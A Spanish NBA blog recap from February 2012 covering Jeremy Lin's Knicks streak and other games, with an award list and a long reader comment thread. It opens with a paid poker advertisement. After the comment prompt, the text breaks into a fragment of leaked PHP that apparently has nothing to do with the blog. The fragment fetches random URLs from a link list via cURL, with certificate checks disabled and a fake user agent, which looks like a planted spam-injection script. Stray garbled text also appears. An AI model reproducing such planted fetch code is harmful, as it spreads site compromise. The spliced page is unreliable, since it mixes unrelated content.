La crónica: Linsanity, episodio VII

16 de February de 2012 por MagicJohnson32

La madrugada del miércoles al jueves nos ha deparado de todo. Ha habido sorpresas, partidos decididos en los últimos segundos, magníficas actuaciones individuales… Ah, y por supuesto, un nuevo capítulo de la Linsanity. Os lo contamos todo en la crónica del día pero antes permitidnos una breve cuña publicitaria:

“Si os gusta el poker online probad esta página (sí, está en portugués pero tiene versión española)”.

Ya está. Ya podemos pagar el hosting y el dominio de este año. Sigamos con lo que realmente nos interesa a todos.

Jeremy Lin nos sigue dando motivos para hablar de él. Anoche cedió el protagonismo anotador y se puso al volante de su equipo para repartir 13 asistencias en 26 minutos y conducir la plácida victoria de su equipo sobre los Kings (85-100). Y si la racha de los Knicks ya va por las siete victorias seguidas, la de los Spurs se extiende hasta las nueve después de su victoria en Toronto (113-106), donde los Raptors volvieron a caer en un final apretado. El acierto de Tony Parker (34 puntos con 12 de 12 en tiros libres, además de 14 asistencias) acabó siendo demasiado para un Calderón de nuevo excelente (16 puntos, 11 asistencias).  Otro duelo interesante fue el que abría la jornada, entre candidatos a la tercera plaza del Este, Sixers @ Magic. Orlando aplicó la fórmula que mejor le funciona, la del dominio interior de Howard y los triples de Ryan Anderson, autor de 27 puntos con 7 de 9 en tiros desde detrás del arco. Poca oposición pudieron poner los de Philadelphia en un día negro para Holiday, completamente superado por Nelson (87-103).

La sorpresa del día fue la que deparó la visita de los Pistons a Boston. Incluso con la baja de Garnett, por cierto bien cubierta por Wilcox, los Celtics no deberían tener problemas ante Detroit. Sin embargo estos Pistons parecen haber recuperado algo del espíritu perdido, y se llevaron el partido de la mano de Monroe, Stuckey y Gordon (69 puntos entre los tres). Fue el acierto de Ben Gordon en el arranque del último cuarto lo que abrió brecha y tumbó a los locales (98-88). Rondo volvió a brillar (35 puntos, 6 asistencias, 5 rebotes, 4 robos) pero Ray Allen y Pierce estuvieron negados. También en la categoría de sorpresa, pero no tanto, podemos registrar la victoria de los Cavs sobre los Pacers (87-98), quienes echaron en falta a Granger más que Cleveland a Varejao. El regreso de Kyrie Irving y la más que notable actuación de Semih Erden fue todo lo que necesitaron los Cavaliers ante el mal día de Paul George. Indiana suma ya cinco derrotas seguidas y empieza a descolgarse de las primeras posiciones de la Conferencia.

rgayEn Houston, los Rockets dieron lo mejor de sí para vencer a los Thunder. No es tanta sorpresa el resultado (95-96) como que Kevin Durant desaprovechase varias oportunidades para ganar el partido, con 0 de 4 en tiros durante el último minuto. Un palmeo de Kyle Lowry y los tiros libres de Kevin Martin, autor de 32 puntos, fueron decisivos para anular a unos Thunder en el que solo Durant, Westbrook y Harden tuvieron un papel relevante. Poco faltó en Newark para que los Nets sorprendiesen a los Grizzlies, pero los errores locales en el tramo decisivo, con varias pérdidas, acabaron por enviar la victoria a Tennessee (105-100). En un día discreto de Marc Gasol, fueron Rudy Gay, Tony Allen y Speights (20 puntos y 18 rebotes por su parte) los encargados de llevar el peso del equipo.

En Dallas, uno de los partidos que se presentaban más atractivos resultó en todo lo contrario. Los 18 puntos de diferencia en el marcador (84-102) no alcanzan a reflejar la superioridad que mostraron los Mavs sobre los Nuggets, que sin Nene y Gallinari no fueron rival ante un equipo al alza como son los vigentes campeones. El 1 de 19 en tiros que sumaron Lawson, Afflalo y Miller es una buena muestra de la terrible actuación ofrecida por el equipo de Colorado. En cambio, hubo mucha emoción en Oakland y Phoenix, en ambos casos con victorias visitantes. Los Blazers ganaron a los Warriors (93-91) pese a la baja de LaMarcus Aldridge, con Gerald Wallace echándose el equipo a la espalda y Jamaal Crawford anotando los tiros decisivos. Ante la escasa aportación de su pareja estelar -Monta Ellis estaba enfermo, y Curry no tuvo el día-, Nate Robinson y David Lee mantuvieron a flote a los suyos en todo momento, pero el triple final de Brandon Rush (líder de la liga en esta categoría) no entró y la victoria fue para Portland. Y en Arizona, Josh Smith volvió a mandar un mensaje a los que le dejaron fuera del All Star Game con una actuación descomunal que compensó el mal día de Joe Johnson, perfectamente marcado por Grant Hill. A punto estuvo Nash de arrebatarle la victoria, pero el triple de Frye para empatar a 10 segundos para el final no entró (101-99).

Y no es Jeremy Lin, pero Pekovic merece que se le preste atención. Su espectacular segunda mitad fue la clave en el triunfo de los Wolves ante los Bobcats, que parecían determinados a acabar con su racha de derrotas el día en que DJ Augustin regresaba a la cancha. Sin embargo, con Kevin Love y Nikola Pekovic como puntales (51 puntos, 19 rebotes entre ambos), los de Minneapolis remontaron y endosaron a Charlotte su 16º partido consecutivo sin ganar (90-102).  La sorprendente victoria de los Hornets en Milwaukee (92-89), con 6 triples de Belinelli, y el triunfo de los Clippers sobre los Wizards (84-102), gracias sobre todo a los 10 puntos de Randy Foye cuando más apretó su ex equipo, completaron todo lo que dio de sí la noche.

PREMIOS

MVP: Josh Smith liquidó a los Suns con una de las mejores actuaciones del año. 30 puntos, 17 rebotes, 7 asistencias, 4 robos y 3 tapones. ¿Todavía queda alguien que no considere una injusticia que no esté en el All Star? En cambio, Tony Parker y Kevin Love no se perderán el evento. Ambos se lo merecen por partidos como los de anoche. 34 puntos y 14 asistencias para el de los Spurs y 30 puntos y 18 rebotes para el de los Wolves.

Rookie: dos partidos de descanso para recuperarse de unas molestias y como nuevo. Kyrie Irving lideró a los Cavs a una victoria con 22 puntos y 5 asistencias. Y Chadler Parsons fue clave en la victoria de los Rockets. No solo por sus 14 puntos y 7 rebotes, sino también por su buena defensa sobre Kevin Durant en los minutos finales.

Sorpresa: 20 puntos y 18 rebotes para Marresse Speights, el sustituto de Zach Randolph en los Grizzlies. ¿Le echan de menos en Philadelphia en estos momentos?

Decepción: Mientras su compañero cogía los mandos, Joe Johnson se borraba del partido frente los Suns: 2 de 10 en tiro para solo 6 puntos. Demasiado poco para un 7 veces All Star. Y los Bobcats llevan 16 derrotas consecutivas

Esfuerzo en vano: Rajon Rondo se multiplicó pero se quedó demasiado solo ante los Pistons. Sus 35 puntos, 5 rebotes, 6 asistencias y 4 robos no encontraron recompensa.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

71 comentarios a esta entrada

  1. Esteban dice:
    #1

    Denise:
    Sobre el peor contrato firmado que antes hablaba Esteban, sin duda el de Joe Johnson, una autentica locura para un simple tirador. Después el de Rashard Lewis seguido por el de Kobe Bryant.

    sobre kobe se puede discutir, creo que se ha ganado cobrar ese dinero, aunque si es mucho, el resto es tirar manteca al techo, jojo no terminara su contrato, saldra por anmistia mas tarde que temprano

      Citar

  2. Esteban dice:
    #2

    MagicJohnson32: No, el límite está sobre los 56 millones, si no recuerdo mal.

    bueno los knicks estan en 62 para el caso, y asi arrancaron la temporada y ellos si pueden ofrecer mas dinero que los clippers

      Citar

  3. Lucho dice:
    #3

    Hola gente como andan? Los leo absolutamente todos los dias pero no suelo comentar, xq sinceramente no suelo estar a la altura de los debates que plantean
    Iba a hacer un offtopic, pero creo que puede pasar x un ontopic: en el trade bass-davis, que buscò cada franquicia? A mi sinceramente me parece bastante mas jugador Bass (puedo equivocarme). Por eso sì me cierra el trade del lado de los Celtics.
    Entonces que buscò Orlando? La posicion supuestamente es la misma, ala pivote. Es x tema salarios? Duracion del contrato? (se que fue incluido Von Wafer para equilibrar). O què aporta Davis por sobre Bass? Mas defensa, rebotes, juego interno?

    Y en el caso felton-miiler?

      Citar

  4. Sancho88 dice:
    #4

    Denise:
    Sobre el peor contrato firmado que antes hablaba Esteban, sin duda el de Joe Johnson, una autentica locura para un simple tirador. Después el de Rashard Lewis seguido por el de Kobe Bryant.

    El de Marbury no se queda atrás. Tb Van Horn robándole 14 kilos a los Bucks, o los 21 que firmó O’Neal bastardete, sea se, Jermaine, con los Raptors…

      Citar

  5. Sancho88 dice:
    #5

    Lucho:
    Hola gente como andan? Los leo absolutamente todos los dias pero no suelo comentar, xq sinceramente no suelo estar a la altura de los debates que plantean
    Iba a hacer un offtopic, pero creo que puede pasar x un ontopic: en el trade bass-davis, que buscò cada franquicia? A mi sinceramente me parece bastante mas jugador Bass (puedo equivocarme). Por eso sì me cierra el trade del lado de los Celtics.
    Entonces que buscò Orlando? La posicion supuestamente es la misma, ala pivote. Es x tema salarios? Duracion del contrato? (se que fue incluido Von Wafer para equilibrar). O què aporta Davis por sobre Bass? Mas defensa, rebotes, juego interno?

    Y en el caso felton-miiler?

    El tema Felton-Miller yo no puedo asegurarlo, pero me parece que una de las razones clave es que McMillan y el propio Miller no se podían ni ver, y cada dos por tres cruzaban palabras de cariño y afecto recíprocamente, como en entrenamientos, viajes, etc.

      Citar

  6. Sempren dice:
    #6

    Supongo que en Felton buscaban algo más de tiro exterior, sobre todo conociendo a McMillan (quien de hecho al principio no ponía a Miller, lo mantenía como suplente de Blake).

    En el caso de Big Baby supongo que Magic confiaba en una explosión, en una mejora de prestaciones si Glen tenía más minutos, o si era más titular. Yo también lo pensaba, pero hasta el año pasado, en el que perdí bastante mi fe en él.

    De todos modos, en el momento también me parecieron unos trades muy planos.

    PD: entre Pekovic y Love capturaron 29 rebotes, no 19 (esos eran muy poquitos para estos dos monstruos).

      Citar

  7. Vader dice:
    #7

    Lucho:
    Y en el caso felton-miiler?

    Lucho:
    Hola gente como andan? Los leo absolutamente todos los dias pero no suelo comentar, xq sinceramente no suelo estar a la altura de los debates que plantean
    Iba a hacer un offtopic, pero creo que puede pasar x un ontopic: en el trade bass-davis, que buscò cada franquicia? A mi sinceramente me parece bastante mas jugador Bass (puedo equivocarme). Por eso sì me cierra el trade del lado de los Celtics.
    Entonces que buscò Orlando? La posicion supuestamente es la misma, ala pivote. Es x tema salarios? Duracion del contrato? (se que fue incluido Von Wafer para equilibrar). O què aporta Davis por sobre Bass? Mas defensa, rebotes, juego interno?

    Y en el caso felton-miiler?

    Sobre este caso los Nuggets buscaban un jugador que ya conocian, Miller, que aceptaba su rol de segundo base por detras de Lawson y que tambien aceptaba hacer de mentor del mismo. Además Miller es un perfil muy diferente a Lawson y se complementan mucho mejor para poder cambiar dinámicas o incluso jugar juntos.

    Felton es un base más joven, que esta en sus mejores años y no estaba muy por la labor de ser suplente y jugar pocos minutos despues de su buena media temporada en los Knicks. En Portland Felton tiene más minutos y supongo que renovará por ellos cosa que en Denver no hubiera hecho.

    Espero haberlo explicado bien, saludos!!

      Citar

  8. Lucho dice:
    #8

    Sancho, Sempren y Vader, muy amables los 3. Se les agradece
    Muchas gracias

      Citar

  9. Esteban dice:
    #9

    alguien me explica por que los ny puede ofrecer mas dinero que los clippers?
    es la esxepcion de nivel medio la q le ofrecen a smith desde ny, y los clippers ya la usaron en martin?

      Citar

  10. MagicJohnson32 dice:
    #10

    Esteban:
    alguien me explica por que los ny puede ofrecer mas dinero que los clippers?
    es la esxepcion de nivel medio la q le ofrecen a smith desde ny, y los clippers ya la usaron en martin?

    Eso es. Se trata de la mini mid level exception, unos 2.5 millones por un máximo de 3 años. Disculpa que no lo aclarase antes 😉

      Citar

  11. MagicJohnson32 dice:
    #11

    Denise:
    Sobre el peor contrato firmado que antes hablaba Esteban, sin duda el de Joe Johnson, una autentica locura para un simple tirador. Después el de Rashard Lewis seguido por el de Kobe Bryant.

    Que alguien banee a este individuo.

      Citar

  12. Esteban dice:
    #12

    nidimger mo es el prototipo de volcador negro, pero eh visto enormes volcadas de su parte lo mismo de geroge, shumpert tiene guerza aunque para mi aun es una incognita y williams me parece muy muy pesado para hacer alguna buena acrobacia en el aire

      Citar

  13. Esteban dice:
    #13

    me dan pena los celtics, un equipo campeon de la nba, y finalista otro año, con sus 3 grandes, unos ganadores natos, no pueden con chicago sin rose, debe ser lamentable para ellos, se deben estar preguntando, para que perdemos un año de nuestras carreras aqui? mas de uno debe soñar on rescindir s contrato y firmar en un equipo contendiente, me refiero a ellen y garnett principalmente, no les queda mas de un año o dos para ser medianamente importantes en un equipo aspirante y lo desperdician asi

    una pena, me recuerdan a hakeem y charles en los tristemente celebres rockets, y eso que contaban con dextler y scottie

      Citar

  14. Denise dice:
    #14

    MagicJohnson32: Que alguien banee a este individuo.

    Muy caballeroso por tu parte el pedir el baneo de alguien simplemente porque no concuerdes con la opinión expresada, despreciando los comentarios de los demás sin aportar tampoco un solo argumento.

    Pues nada, que me baneen a mí, después al resto hasta que dejemos el blog a ti solito.

      Citar

  15. Nacho dice:
    #15

    Sobre el fenómeno Lin he tenido una duda siempre… “este tipo ha hecho un pacto con el diablo” me repetía a mí mismo. Pero hete aquí que he visto este reportaje:
    http://www.canalplus.es/nba/gnba+/
    … y me he dado cuenta de que el pacto con el diablo lo ha hecho D’Antoni. Solo hay que verle la cara cuando habla, es de una felicidad contenida que… se nota que ha salvado el culo como entrenador, pero no está feliz del todo, ¿por qué?; porque no sabemos que le ha pedido el diabloooo. ¡Montes, ¿dónde estás?!

      Citar

  16. melo15 dice:
    #16

    Bueno, yo el trade de Pau a los Wolves lo veo una tonteria, los Wolves, ya tienen un buen juego interior, Love, Pekovic, Randolph y Milicic, para que quieren a Pau??
    Yo aprovecharia esos jugadores que tu dices (Beasley, Wes, Williams…) En buscar un escolta y un alero capaz.
    Sobre los contratos, uno de los peores es el de Chandler, que cobra un monton y ya tiene 30 años, el de Kobe, depende si sigue a este nivel es justo, pero como se lesione, o se vuelve un jugador mediocre, entonces sera una cagada

      Citar

  17. Txusma dice:
    #17

    Denise: Muy caballeroso por tu parte el pedir el baneo de alguien simplemente porque no concuerdes con la opinión expresada, despreciando los comentarios de los demás sin aportar tampoco un solo argumento.

    Pues nada, que me baneen a mí, después al resto hasta que dejemos el blog a ti solito.

    Hombre, Denise. Que Magic solo ha hecho un comentario sarcástico y creo que creyendo que ya os conoceríais lo suficiente como para q no le tomaras en serio.
    La verdad es que el contrato de Kobe es una pasada, pero yo prefiero pagarle 30 millones a Kobe Bryant que 5 a Petro, por ejemplo.

      Citar

  18. TheDeerHunter dice:
    #18

    Denise: Muy caballeroso por tu parte el pedir el baneo de alguien simplemente porque no concuerdes con la opinión expresada, despreciando los comentarios de los demás sin aportar tampoco un solo argumento.

    Pues nada, que me baneen a mí, después al resto hasta que dejemos el blog a ti solito.

    Macho Denise… últimamente estás de un susceptible subidísimo.
    Nadie aquí quiere tu baneo. En qué cabeza cabe. Todo lo contrario. Creo que es evidente que hay bastante aprecio a tu participación por parte nuestra.
    Está claro que es un chascarrillo. Sin más.

      Citar

  19. TheDeerHunter dice:
    #19

    Y volviendo al tema… al mejor jugador del mundo se le hace el mejor contrato del mundo, es de cajón. Otra cosa es que todo el mundo termina envejeciendo y eso lo saben bien los equipos… casualmente casi todos los contratos contienen un incremento anual establecido. Qué cosas.
    El coste que se tiene presente viene a ser el total… y creo que hay pocos jugadores más rentables que Kobe en los últimos 15 años de liga.

    Pero vamos, que es lo de siempre. Los Lakers miran por ser todos los años la franquicia que más vende y, de paso, la que más gana deportivamente. Por eso las inversiones se hacen a lo grande. Son otros los que deben de seguir ese ejemplo o demostrar que se puede cambiar el modelo.

      Citar

  20. Sancho88 dice:
    #20

    Magic que se deje de sarcasmos y que publique ya un reflexiones sobre la bocina, o en su defecto, un álbum fotográfico royo Mcilbaine, Eric Montross, Potapenko, Bryant Reevs, Luc Longley… y todos ellos con sus respectivos pies de fotos para que nos echemos unas risas. Vamooooooooooooooooos!!!!!!!!!!!!!!!!!!!!!!!!!!!

      Citar

  21. MagicJohnson32 dice:
    #21

    Pero hombre, Denise, yo pensaba que después de nuestro trade Paul George por Scola había algo entre tú y yo… En serio, era broma, era muy tarde para ponerme a argmentar los motivos por los que el contrato de Kobe no puede ponerse al nivel de los de JJ o Rashard Lewis, ni los de Arenas, Amare o tantos otros que cobran menos que Bryant. Aunque se puede resumir rápidamente: Anillos.

    Sancho88:
    Magic que se deje de sarcasmos y que publique ya un reflexiones sobre la bocina, o en su defecto, un álbum fotográfico royo Mcilbaine, Eric Montross, Potapenko, Bryant Reevs, Luc Longley… y todos ellos con sus respectivos pies de fotos para que nos echemos unas risas. Vamooooooooooooooooos!!!!!!!!!!!!!!!!!!!!!!!!!!!

    Tengo una exclusiva sobre Todd McCullogh que te va a encantar xDDD

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>